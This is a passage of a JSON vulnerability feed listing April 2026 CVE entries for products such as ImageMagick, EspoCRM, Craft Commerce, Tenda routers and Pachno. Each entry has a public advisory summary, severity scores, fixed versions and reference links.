\nUpdate UniFi Play Audio Port  to Version 1.1.9 or later","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00011,"ranking_epss":0.0142,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22566","summary":"An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to obtain UniFi Play WiFi credentials.
 \n\nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier)
\nUniFi Play Audio Port  (Version 1.0.24 and earlier)
 \n\nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later
\nUpdate UniFi Play Audio Port  to Version 1.1.9 or later","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00011,"ranking_epss":0.01402,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33902","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, a stack overflow vulnerability in ImageMagick's FX expression parser allows an attacker to crash the process by providing a deeply nested expression. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01569,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/d3c0a37485314c5ccef72efb18f3847cd53868ba","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-f4qm-vj5j-9xpw","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33905","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, the -sample operation has an out of bounds read when an specific offset is set through the `sample:offset` define that could lead to an out of bounds read. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/cca607366fb38c2dde019a9088b8415ffba3a835","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pcvx-ph33-r5vv","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33908","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, Magick frees the memory of the XML tree via the `DestroyXMLTree()` function; however, this process is executed recursively with no depth limit imposed. When Magick processes an XML file with deeply nested structures, it will exhaust the stack memory, resulting in a Denial of Service (DoS) attack. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00041,"ranking_epss":0.12417,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/ccdc01180276aa2cb3d4a32a611aa4f417061cd8","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fwvm-ggf6-2p4x","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22562","summary":"A malicious actor with access to the UniFi Play network could exploit a Path Traversal vulnerability found in the device firmware to write files on the system that could be used for a remote code execution (RCE).\n \nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier)
UniFi Play Audio Port  (Version 1.0.24 and earlier)
 \nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later
Update UniFi Play Audio Port  to Version 1.1.9 or later","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00114,"ranking_epss":0.2989,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83"],"published_time":"2026-04-13T22:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6216","summary":"A security vulnerability has been detected in DbGate up to 7.1.4. This affects an unknown function of the file packages/web/src/icons/FontIcon.svelte of the component SVG Icon String Handler. Such manipulation of the argument applicationIcon leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 7.1.5 mitigates this issue. It is advisable to upgrade the affected component.","cvss":5.1,"cvss_version":4.0,"cvss_v2":4.0,"cvss_v3":3.5,"cvss_v4":5.1,"epss":0.00031,"ranking_epss":0.08675,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/dbgate/dbgate/","https://github.com/dbgate/dbgate/releases/tag/v7.1.5","https://vuldb.com/submit/785841","https://vuldb.com/vuln/357135","https://vuldb.com/vuln/357135/cti"],"published_time":"2026-04-13T21:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6218","summary":"A vulnerability was found in aandrew-me ytDownloader up to 3.20.2. Affected by this issue is the function createTextNode of the component Error Details Panel. The manipulation results in cross site scripting. The attack may be performed from remote. The vendor was contacted early about this disclosure.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00031,"ranking_epss":0.08611,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ngocnn97/security-advisories/blob/main/YtDownloader_XSS_To_RCE_PoC.mp4","https://vuldb.com/submit/785842","https://vuldb.com/vuln/357139","https://vuldb.com/vuln/357139/cti"],"published_time":"2026-04-13T21:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6219","summary":"A vulnerability was determined in aandrew-me ytDownloader up to 3.20.2. This affects the function child_process.exec of the file src/compressor.js of the component Compressor Feature. This manipulation causes command injection. The attack can only be executed locally. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure.","cvss":4.8,"cvss_version":4.0,"cvss_v2":4.3,"cvss_v3":5.3,"cvss_v4":4.8,"epss":0.00178,"ranking_epss":0.39341,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/ngocnn97/53a9f251d1cb99b1b8033e211407d1b1","https://github.com/ngocnn97/security-advisories/blob/main/YtDownloader_Command_Injection_PoC.mp4","https://vuldb.com/submit/785843","https://vuldb.com/submit/785844","https://vuldb.com/vuln/357140","https://vuldb.com/vuln/357140/cti"],"published_time":"2026-04-13T21:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33740","summary":"EspoCRM is an open source customer relationship management application. In versions 9.3.3 and below, the POST /api/v1/Email/importEml endpoint contains an Insecure Direct Object Reference (IDOR) vulnerability where the attacker-supplied fileId parameter is used to fetch any attachment directly from the repository without verifying that the current user has authorization to access it. Any authenticated user with Email:create and Import permissions can exploit this to read another user's .eml attachment contents by importing them as a new email into the attacker's mailbox, while the original victim attachment record is deleted as a side effect of the import flow. This is inconsistent with the standard attachment download path, which enforces ACL checks before returning file data, and is practically exploitable because attachment IDs are commonly exposed in normal UI and API workflows such as stream payloads and download links. This issue is fixed in version 9.3.4.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05422,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/espocrm/espocrm/commit/88e3ba6a7b5cab5dbc2298e2a093d3aa383aa95f","https://github.com/espocrm/espocrm/releases/tag/9.3.4","https://github.com/espocrm/espocrm/security/advisories/GHSA-wr7j-hxf8-hc4w"],"published_time":"2026-04-13T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33899","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-189 and 6.9.13-44, when `Magick` parses an XML file it is possible that a single zero byte is written out of the bounds. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11627,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/ae679e2fd19ec656bfab9f822ae4cf06bf91604d","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cr67-pvmx-2pp2","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33900","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, the viff encoder contains an integer truncation/wraparound issue on 32-bit builds that could trigger an out of bounds heap write, potentially causing a crash. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12475,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/d27b840a61b322419a66d0d192ff56d52498148d","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v67w-737x-v2c9","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33901","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, a heap buffer overflow occurs in the MVG decoder that could result in an out of bounds write when processing a crafted image. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00038,"ranking_epss":0.11187,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/4c72003e9e54a4ebaa938d239e75f5d285527ebe","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-x9h5-r9v2-vcww","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26460","summary":"A HTML Injection vulnerability exists in the Dashboard module of Vtiger CRM 8.4.0. The application fails to properly neutralize user-supplied input in the tabid parameter of the DashBoardTab view (getTabContents action), allowing an attacker to inject arbitrary HTML content into the dashboard interface. The injected content is rendered in the victim's browser","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.simonjuguna.com/cve-2026-26460-html-injection-vulnerability-in-vtiger-open-source-edition-v8-4-0/","https://www.vtiger.com/open-source-crm/"],"published_time":"2026-04-13T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31280","summary":"An issue in the Bluetooth RFCOMM service of Parani M10 Motorcycle Intercom v2.1.3 allows unauthorized attackers to cause a Denial of Service (DoS) via supplying crafted RFCOMM frames.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.03861,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://amoebatech.gitbook.io/amoebatech-docs/cve-2026-31280-insecure-bluetooth-rfcomm-leading-to-device-crash-in-parani-m10-intercom","https://nvd.nist.gov/vuln/detail/cve-2023-4586","https://nvd.nist.gov/vuln/detail/cve-2025-20701"],"published_time":"2026-04-13T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32271","summary":"Craft Commerce is an ecommerce platform for Craft CMS. In versions 4.0.0 through 4.10.2 and 5.0.0 through 5.5.4, there is an SQL injection vulnerability in the Commerce TotalRevenue widget which allows any authenticated control panel user to achieve remote code execution through a four-step exploitation chain. The attack exploits unsanitized widget settings interpolated into SQL expressions, combined with PDO's default multi-statement query support, to inject a maliciously serialized PHP object into the queue table. When the queue consumer processes the injected job, the unrestricted unserialize() call in yii2-queue instantiates a GuzzleHttp FileCookieJar gadget chain whose __destruct() method writes a PHP webshell to the server's webroot. The complete chain requires only three HTTP requests, no administrative privileges, and results in arbitrary command execution as the PHP process user, with queue processing triggered via an unauthenticated endpoint. This issue has been fixed in versions 4.10.3 and 5.5.5.","cvss":7.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.7,"epss":0.00198,"ranking_epss":0.4186,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/craftcms/commerce/commit/6d2d24b3a2b0c06593856d05446f82bd8af92d72","https://github.com/craftcms/commerce/security/advisories/GHSA-875v-7m49-8x88"],"published_time":"2026-04-13T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32272","summary":"Craft Commerce is an ecommerce platform for Craft CMS. In versions 5.0.0 through 5.5.4, an SQL injection vulnerability exists where the ProductQuery::hasVariant and VariantQuery::hasProduct properties bypass the input sanitization blocklist added to ElementIndexesController in a prior security fix (GHSA-2453-mppf-46cj). The blocklist only strips top-level Yii2 Query properties such as where and orderBy, but hasVariant and hasProduct pass through untouched and internally call Craft::configure() on a subquery without sanitization, re-introducing SQL injection. Any authenticated control panel user can exploit this via boolean-based blind SQL injection to extract arbitrary database contents, including security keys that enable forging admin sessions for privilege escalation. This issue has been fixed in version 5.6.0.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.0003,"ranking_epss":0.08479,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/advisories/GHSA-2453-mppf-46cj","https://github.com/craftcms/commerce/pull/4232","https://github.com/craftcms/commerce/releases/tag/5.6.0","https://github.com/craftcms/commerce/security/advisories/GHSA-r54v-qq87-px5r"],"published_time":"2026-04-13T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33659","summary":"EspoCRM is an open source customer relationship management application. In versions 9.3.3 and below, the POST /api/v1/Attachment/fromImageUrl endpoint is vulnerable to Server-Side Request Forgery (SSRF) via a DNS rebinding (TOCTOU) condition. Host validation uses dns_get_record() but the actual HTTP request resolves hostnames through curl's internal resolver (gethostbyname()), allowing the two lookups to return different IP addresses for the same hostname. A secondary issue exists where an empty DNS result (due to DNS failure, IPv6-only domains, or non-existent hostnames) causes the validation to implicitly allow the host without further checks. An authenticated attacker with default attachment creation access can exploit this gap to bypass internal IP restrictions and scan internal network ports, confirm the existence of internal hosts, and interact with internal HTTP-based services, though data extraction from binary protocol services and remote code execution are not possible through this endpoint. This issue has been fixed in version 9.3.4.","cvss":3.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.5,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11692,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/espocrm/espocrm/commit/dca03cc3458e487362c26c746378a2d4de9990b1","https://github.com/espocrm/espocrm/releases/tag/9.3.4","https://github.com/espocrm/espocrm/security/advisories/GHSA-6m4j-fwrx-crh7","https://github.com/espocrm/espocrm/security/advisories/GHSA-6m4j-fwrx-crh7"],"published_time":"2026-04-13T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-51414","summary":"In Phpgurukul Online Course Registration v3.1, an arbitrary file upload vulnerability was discovered within the profile picture upload functionality on the /my-profile.php page.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/12T40910/CVE/issues/12","https://medium.com/@tanushkushtk01/cve-2025-51414-unrestricted-file-upload-in-online-course-registration-v3-1-bd8b839be1d7"],"published_time":"2026-04-13T21:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-70936","summary":"Vtiger CRM 8.4.0 contains a reflected cross-site scripting (XSS) vulnerability in the MailManager module. Improper handling of user-controlled input in the _folder parameter allows a specially crafted, double URL-encoded payload to be reflected and executed in the context of an authenticated user s session.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.simonjuguna.com/cve-2025-70936-reflected-xss-vulnerability-in-vtiger-crm-v8-4-0/","https://www.vtiger.com/open-source-crm/"],"published_time":"2026-04-13T21:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6201","summary":"A vulnerability was identified in CodeAstro Online Job Portal 1.0. The impacted element is an unknown function of the file /jobs/job-delete.php of the component Delete Job Posting Handler. Such manipulation of the argument ID leads to improper access controls. The attack can be launched remotely. The exploit is publicly available and might be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.5,"cvss_v3":5.4,"cvss_v4":5.3,"epss":0.00036,"ranking_epss":0.10595,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://codeastro.com/","https://github.com/Xmyronn/CodeAstro-Online-Job-Portal-IDOR.git","https://vuldb.com/submit/797515","https://vuldb.com/vuln/357123","https://vuldb.com/vuln/357123/cti"],"published_time":"2026-04-13T20:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6202","summary":"A security flaw has been discovered in code-projects Easy Blog Site 1.0. This affects an unknown function of the file post.php. Performing a manipulation of the argument tags results in sql injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/Learner636/CVE-smbmit/issues/6","https://vuldb.com/submit/797629","https://vuldb.com/vuln/357124","https://vuldb.com/vuln/357124/cti"],"published_time":"2026-04-13T20:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6215","summary":"A weakness has been identified in DbGate up to 7.1.4. The impacted element is the function apiServerUrl1 of the file packages/rest/src/openApiDriver.ts of the component REST/GraphQL. This manipulation causes server-side request forgery. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00032,"ranking_epss":0.08994,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://vuldb.com/submit/785836","https://vuldb.com/vuln/357134","https://vuldb.com/vuln/357134/cti"],"published_time":"2026-04-13T20:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33657","summary":"EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below have a stored HTML injection vulnerability that allows any authenticated user with standard (non-administrative) privileges to inject arbitrary HTML into system-generated email notifications by crafting malicious content in the post field of stream activity notes. The vulnerability exists because server-side Handlebars templates render the post field using unescaped triple-brace syntax, the Markdown processor preserves inline HTML by default, and the rendering pipeline explicitly skips sanitization for fields present in additionalData, creating a path where attacker-controlled HTML is accepted, stored, and rendered directly into emails without any escaping. Since the emails are sent using the system's configured SMTP identity (such as an administrative sender address), the injected content appears fully trusted to recipients, enabling phishing attacks, user tracking via embedded resources like image beacons, and UI manipulation within email content. The @mention feature further increases the impact by allowing targeted delivery of malicious emails to specific users. This issue has been fixed in version 9.3.4.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07972,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/espocrm/espocrm/releases/tag/9.3.4","https://github.com/espocrm/espocrm/security/advisories/GHSA-8prm-r5j9-j574","https://github.com/espocrm/espocrm/security/advisories/GHSA-8prm-r5j9-j574"],"published_time":"2026-04-13T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31048","summary":"An issue in the <code>pickle</code> protocol of Pyro v3.x allows attackers to execute arbitrary code via supplying a crafted pickled string message.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.04032,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Sif-0x01/security-advisories/security/advisories/GHSA-7625-w9h5-83rv","https://github.com/irmen/Pyro3/blob/master/Pyro/protocol.py#L672-L711","https://github.com/irmen/Pyro3/blob/master/docs/9-security.html#L341-L346"],"published_time":"2026-04-13T20:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32270","summary":"Craft Commerce is an ecommerce platform for Craft CMS. In versions 4.0.0 through 4.10.2 and 5.0.0 through 5.5.4, the PaymentsController::actionPay discloses some order data to unauthenticated users when an order number is provided and the email check fails during an anonymous payment. The JSON error response includes the serialized order object (order), which contains some sensitive fields such as customer email, shipping address, and billing address. The frontend payment flow's actionPay() retrieves orders by number before authorization is fully enforcedLoad order by number. This issue has been fixed in versions 4.11.0 and 5.6.0.","cvss":1.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":1.7,"epss":0.00047,"ranking_epss":0.14409,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/craftcms/commerce/commit/48a5d946419964e2af1ac64a8e1acc2a32ca0a08","https://github.com/craftcms/commerce/releases/tag/4.11.0","https://github.com/craftcms/commerce/releases/tag/5.6.0","https://github.com/craftcms/commerce/security/advisories/GHSA-3vxg-x5f8-f5qf"],"published_time":"2026-04-13T20:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32605","summary":"nimiq/core-rs-albatross is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.3.0, an untrusted peer could crash a validator by publishing a signed tendermint proposal message where signer == validators.num_validators(). ProposalSender::send uses > instead of >= for the signer bounds check, so the equality case passes and reaches validators.get_validator_by_slot_band(signer), which panics with an out-of-bounds index before any signature verification runs. This issue has been fixed in version 1.3.0.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12475,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/nimiq/core-rs-albatross/commit/9199364b60c7acae4219800d194bbe07d2997b8c","https://github.com/nimiq/core-rs-albatross/pull/3661","https://github.com/nimiq/core-rs-albatross/releases/tag/v1.3.0","https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-g99c-h7j7-rfhv"],"published_time":"2026-04-13T20:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33534","summary":"EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below have an authenticated Server-Side Request Forgery (SSRF) vulnerability that allows bypassing the internal-host validation logic by using alternative IPv4 representations such as octal notation (e.g., 0177.0.0.1 instead of 127.0.0.1). This is caused by HostCheck::isNotInternalHost() function relying on PHP's filter_var(..., FILTER_VALIDATE_IP), which does not recognize alternative IP formats, causing the validation to fall through to a DNS lookup that returns no records and incorrectly treats the host as safe, however the cURL subsequently normalizes the address and connects to the loopback destination. Through the confirmed /api/v1/Attachment/fromImageUrl endpoint, an authenticated user can force the server to make requests to loopback-only services and store the fetched response as an attachment. This vulnerability is distinct from CVE-2023-46736 (which involved redirect-based SSRF) and may allow access to internal resources reachable from the application runtime. This issue has been fixed in version 9.3.4.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06878,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/espocrm/espocrm/releases/tag/9.3.4","https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73","https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73"],"published_time":"2026-04-13T20:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6199","summary":"A vulnerability was found in Tenda F456 1.0.0.5. Impacted is the function fromqossetting of the file /goform/qossetting. The manipulation of the argument page results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_116/README.md","https://vuldb.com/submit/797471","https://vuldb.com/vuln/357121","https://vuldb.com/vuln/357121/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T19:16:58","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6200","summary":"A vulnerability was determined in Tenda F456 1.0.0.5. The affected element is the function formwebtypelibrary of the file /goform/webtypelibrary. This manipulation of the argument menufacturer/Go causes stack-based buffer overflow. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_117/README.md","https://vuldb.com/submit/797472","https://vuldb.com/vuln/357122","https://vuldb.com/vuln/357122/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T19:16:58","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6197","summary":"A flaw has been found in Tenda F456 1.0.0.5. This vulnerability affects the function formWrlsafeset of the file /goform/AdvSetWrlsafeset. Executing a manipulation of the argument mit_ssid can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been published and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_114/README.md","https://vuldb.com/submit/797468","https://vuldb.com/vuln/357119","https://vuldb.com/vuln/357119/cti","https://www.tenda.com.cn/","https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_114/README.md"],"published_time":"2026-04-13T19:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6198","summary":"A vulnerability has been found in Tenda F456 1.0.0.5. This issue affects the function fromNatStaticSetting of the file /goform/NatStaticSetting. The manipulation of the argument page leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_115/README.md","https://vuldb.com/submit/797470","https://vuldb.com/vuln/357120","https://vuldb.com/vuln/357120/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T19:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40043","summary":"Pachno 1.0.6 contains an authentication bypass vulnerability in the runSwitchUser() action that allows authenticated low-privilege users to escalate privileges by manipulating the original_username cookie. Attackers can set the client-controlled original_username cookie to any value and request a switch to user ID 1 to obtain session tokens or password hashes belonging to administrator accounts.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00073,"ranking_epss":0.22122,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-authentication-bypass-via-runswitchuser","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5985.php","https://www.zeroscience.mk/#/advisories/ZSL-2026-5985"],"published_time":"2026-04-13T19:16:52","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40044","summary":"Pachno 1.0.6 contains a deserialization vulnerability that allows unauthenticated attackers to execute arbitrary code by injecting malicious serialized objects into cache files. Attackers can write PHP object payloads to world-writable cache files with predictable names in the cache directory, which are unserialized during framework bootstrap before authentication checks occur.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":9.3,"epss":0.00136,"ranking_epss":0.33334,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.vulncheck.com/advisories/pachno-filecache-deserialization-remote-code-execution","https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5986.php"],"published_time":"2026-04-13T19:16:52","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40038","summary":"Pachno 1.0.6 contains a stored cross-site scripting vulnerability that allows attackers to execute arbitrary HTML and script code by injecting malicious payloads into POST parameters. Attackers can inject scripts through the value, comment_body, article_content, description, and message parameters across multiple controllers, which are stored in the database and executed in users' browser sessions due to improper sanitization via Request::getRawParameter() or Request::getParameter() 